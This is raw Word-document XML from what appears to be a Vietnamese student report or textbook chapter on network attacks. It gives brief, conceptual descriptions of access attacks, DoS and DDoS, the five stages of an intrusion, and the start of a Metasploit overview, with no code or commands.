      <w:r w:rsidR="000D263F" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> là trá</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>i với pháp luật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5853E8" w14:textId="77777777" w:rsidR="005A4040" w:rsidRPr="00C73388" w:rsidRDefault="005A4040" w:rsidP="005A4040">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FE8253" w14:textId="77777777" w:rsidR="006B609F" w:rsidRPr="00C73388" w:rsidRDefault="006B609F" w:rsidP="00ED2B9A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C43A89" w14:textId="77777777" w:rsidR="006B609F" w:rsidRPr="00C73388" w:rsidRDefault="006B609F"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4.2.2.2.  Các kỹ thuật tấn công truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389F046" w14:textId="14E260E7"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Nghe lén.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638F8B5D" w14:textId="54C61D6F"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Sử dụng lại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12515211" w14:textId="67C087E9"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Cướp giao dịch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A227A75" w14:textId="60CA91D6"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ẻ đứng giữa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACC75A9" w14:textId="6747D8D5"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Cổng sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBAC5ED" w14:textId="15D8C2C9"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Đánh lừa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701FFA78" w14:textId="5B9C5D70"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hai thác lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043AB773" w14:textId="7D56DE41" w:rsidR="006B609F" w:rsidRPr="00C73388" w:rsidRDefault="006B609F" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Tấn công mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D6CF4" w14:textId="77777777" w:rsidR="006B609F" w:rsidRPr="00C73388" w:rsidRDefault="006B609F" w:rsidP="006B609F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68115E2D" w14:textId="4E52312A" w:rsidR="006B609F" w:rsidRPr="00C73388"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4.2.3. Tấn công từ chối dịch vụ (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAC47FA" w14:textId="2A6F5593" w:rsidR="006B609F" w:rsidRPr="00C73388"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I.4.2.3.1. Khái niệm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C32AEC3" w14:textId="61D4B5AE" w:rsidR="006B609F"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t>Là tấn công phá hoại chứ không nhằm mục đích lấy được thông tin. Tấn công từ chối dịch vụ DoS có thể mô tả như hành động ngăn cản những người dùng hợp pháp khả năng truy cập và sử dụng vào một dịch vụ nào đó. Nó bao gồm làm tràn ngập mạng, mất kết nối với dịch vụ… mà mụcc đích cuối cùng là Server không thể đáp ứng đựng các yêu cầu từ Client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497168E3" w14:textId="77777777" w:rsidR="00A504D3" w:rsidRDefault="00A504D3" w:rsidP="006B609F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD11580" w14:textId="77777777" w:rsidR="00A504D3" w:rsidRDefault="00A504D3" w:rsidP="00A504D3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A504D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Hình thức tấn công Dos này chắc không còn mới mẻ với chúng ta. Kiểu tấn công mạng Dos này, kẻ tấn công sẽ gửi hàng loạt những yêu cầu với số lượng cực lớn (vượt quá khả năng xử lý tới hệ thống nạn nhân), làm cho hệ thống bị tạm dừng hoạt động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652CF2C4" w14:textId="77777777" w:rsidR="00A504D3" w:rsidRPr="00A504D3" w:rsidRDefault="00A504D3" w:rsidP="00A504D3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="323297CF" w14:textId="77777777" w:rsidR="00A504D3" w:rsidRPr="00A504D3" w:rsidRDefault="00A504D3" w:rsidP="00A504D3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED19BBE" w14:textId="59F69E8A" w:rsidR="00A504D3" w:rsidRPr="00C73388" w:rsidRDefault="00A504D3" w:rsidP="00A504D3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A504D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Ngoài ra, phương pháp xâm nhập hệ thống Social Engineering như email lừa đảo, đường link lạ, thông báo giải thưởng cũng là một kỹ thuật được tin tặc áp dụng thường xuyên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF255DB" w14:textId="77777777" w:rsidR="006B609F" w:rsidRPr="00C73388" w:rsidRDefault="006B609F" w:rsidP="006B609F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384ACF9E" w14:textId="6AA50911" w:rsidR="006B609F" w:rsidRPr="00C73388" w:rsidRDefault="006B609F" w:rsidP="006B609F">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 xml:space="preserve">II.4.2.3.2. Các </w:t>
      </w:r>
      <w:r w:rsidR="00997AB4" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>kỹ thuật tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1F5FA5" w14:textId="661C3F33" w:rsidR="00997AB4" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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ỹ thuật làm lụt bằng SYN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14D42B" w14:textId="71DA2924" w:rsidR="00997AB4" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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ỹ thuật làm lụt UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B04E323" w14:textId="54D9B12B" w:rsidR="00997AB4" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:num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Kỹ thuật DoS phân tán (DDoS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6EADD1" w14:textId="77777777" w:rsidR="00997AB4" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4" w:rsidP="00997AB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE6557C" w14:textId="53A7425C" w:rsidR="00BF59A0" w:rsidRPr="00C73388" w:rsidRDefault="00BF59A0"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I</w:t>
      </w:r>
      <w:r w:rsidR="00997AB4" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>I.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>. Các giai đoạn tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E56B97" w14:textId="7367F55A" w:rsidR="001D1327" w:rsidRPr="00C73388" w:rsidRDefault="001D1327" w:rsidP="00ED2B9A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D25D948" wp14:editId="344FC5E7">
            <wp:extent cx="4572000" cy="3619500"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="1" name="Picture 1" descr="Screen%20Shot%202019-04-04%20at%202.2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04%20at%202.26.3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14:paraId="4F27B843" w14:textId="52C60532" w:rsidR="00C85407" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4" w:rsidP="00C85407">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>II.5</w:t>
      </w:r>
      <w:r w:rsidR="00C85407" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">.1. Thăm dò </w:t>
      </w:r>
      <w:r w:rsidR="00C85407" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (Reconnaissace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC4C6A" w14:textId="77777777" w:rsidR="001D1327" w:rsidRPr="00C73388" w:rsidRDefault="00C85407" w:rsidP="001D1327">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1D1327" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Thăm dò mục tiêu là một trong những bước qua trọng để biết những thông tin trên hệ thống mục tiêu. Hacker sử dụng kỹ thuật này để khám phá hệ thống mục tiêu đang chạy trên hệ điều hành nào, có bao nhiêu dịch vụ đang chạy trên các dịch vụ đó, cổng dịch vụ nào đang đóng và cổng nào đang mở, gồm hai loại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C60E3" w14:textId="77777777" w:rsidR="001D1327" w:rsidRPr="00C73388" w:rsidRDefault="001D1327" w:rsidP="001D1327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425DD156" w14:textId="5AC3BE1A" w:rsidR="001D1327" w:rsidRPr="00C73388" w:rsidRDefault="001D1327" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Passive: Thu thập các thông tin chung như vị trí địa lý, điện thoại, email của các cá nhân, người điều hành trong tổ chức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2434A729" w14:textId="77777777" w:rsidR="001D1327" w:rsidRPr="00C73388" w:rsidRDefault="001D1327" w:rsidP="001D1327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEB38A7" w14:textId="0F530F09" w:rsidR="001D1327" w:rsidRPr="00C73388" w:rsidRDefault="001D1327" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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ctive: Thu thập các thông</w:t>
      </w:r>
      <w:r w:rsidR="00FF53AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin về địa chỉ IP, domain, DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>… của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D14C0" w14:textId="77777777" w:rsidR="001D1327" w:rsidRPr="00C73388" w:rsidRDefault="001D1327" w:rsidP="001D1327">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D365AFF" w14:textId="63E7B7CA" w:rsidR="001D1327" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4" w:rsidP="001D1327">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1D1327" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">.2. </w:t>
      </w:r>
      <w:r w:rsidR="00347962" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Quét hệ thống (Scanning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43926A59" w14:textId="594DC758" w:rsidR="001D1327" w:rsidRPr="00C73388" w:rsidRDefault="001D1327" w:rsidP="001D1327">
      <w:pPr>
        <w:ind w:firstLine="720"/>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Quét thăm dò hệ thống là phương pháp quan trọng mà Attacker thường dùng để tìm hiểu hệ thống và thu thập các thông tin như địa chỉ IP cụ thể, hệ điều hành hay các kiến trúc hệ thống mạng. Một vài phương pháp quét thông dụng như: quét cổng, quét mạng và quét các điểm yếu trên hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A15567A"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19D1DC28" w14:textId="6CAE0B04" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4"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347962" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.3. Chiếm quyền điều khiển (Gainning access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F7B5B0" w14:textId="5CD43939" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00347962" w:rsidP="00347962">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Đến đây hacker đã bắt đầu dần dần xâm nhập được hệ thống và tấn công nó, đã truy cập được nó bằng các lệnh khai thác. Các lệnh khai thác luôn ở bất cứ không gian nào, từ mạng LAN cho tới INTERNET và đã lan rộng ra mạng không dây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2545A595" w14:textId="0A10A72F" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00347962"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Hacker có thể chiếm quyền điều khiển tại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B96538" w14:textId="77777777" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00347962" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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ức hệ điều hành/ mức ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3EAE7E" w14:textId="77777777" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00347962" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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ức mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA37CC9" w14:textId="42B8CA80" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00347962" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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Từ chối dịch vụ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA3F38"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455F9DB2" w14:textId="76F1EC0F" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4"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347962" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.4. Duy trì điều khiển hệ thống (Maitaining access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662EDF76" w14:textId="067497A2" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00347962" w:rsidP="00347962">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Đến đây hacker bắt đầu phá hỏng làm hại, hoặc có thể cài trojan, rootkit, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA61F7" w14:textId="5930A995" w:rsidR="00C85407" w:rsidRPr="00C73388" w:rsidRDefault="00347962"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backdoor để lấy thông tin thêm. Thường được thấy sử dụng để đánh cắp tài khoản tín dụng, ngân hàng...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE69BE3"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5EC23E42" w14:textId="42F0AD2E" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4" w:rsidP="00347962">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5</w:t>
      </w:r>
      <w:r w:rsidR="00347962" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">.5. Xoá dấu vết (Clearning tracks) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B8AA4" w14:textId="77777777" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00347962" w:rsidP="00347962">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF71660" w14:textId="71528992" w:rsidR="00347962" w:rsidRPr="00C73388" w:rsidRDefault="00347962" w:rsidP="00347962">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Được đề cập đến hoạt động được thực hiện bằng cách hacker cố tình che dấu hành động xâm nhập của mình. Hacker phải tìm cách xóa đi dấu vết mỗi khi đột nhập bằng các phương thức như Steganography, tunneling, and altering log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E898C8C" w14:textId="77777777" w:rsidR="00997AB4" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4" w:rsidP="00997AB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE19B7E" w14:textId="5CD9D20F" w:rsidR="00997AB4" w:rsidRPr="00C73388" w:rsidRDefault="00997AB4" w:rsidP="00997AB4">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w:t>
      </w:r>
      <w:r w:rsidR="00C23A3A" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> TỔNG QUAN VỀ METASPLOIT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4ADD5" w14:textId="35C27963" w:rsidR="001D4F23" w:rsidRPr="00C73388" w:rsidRDefault="001D4F23" w:rsidP="00997AB4">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1. </w:t>
      </w:r>
      <w:r w:rsidR="002E4C1E" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE13F80" w14:textId="77777777" w:rsidR="002E4C1E" w:rsidRPr="00C73388" w:rsidRDefault="002E4C1E" w:rsidP="002E4C1E">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1.1. Khái niệm về lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
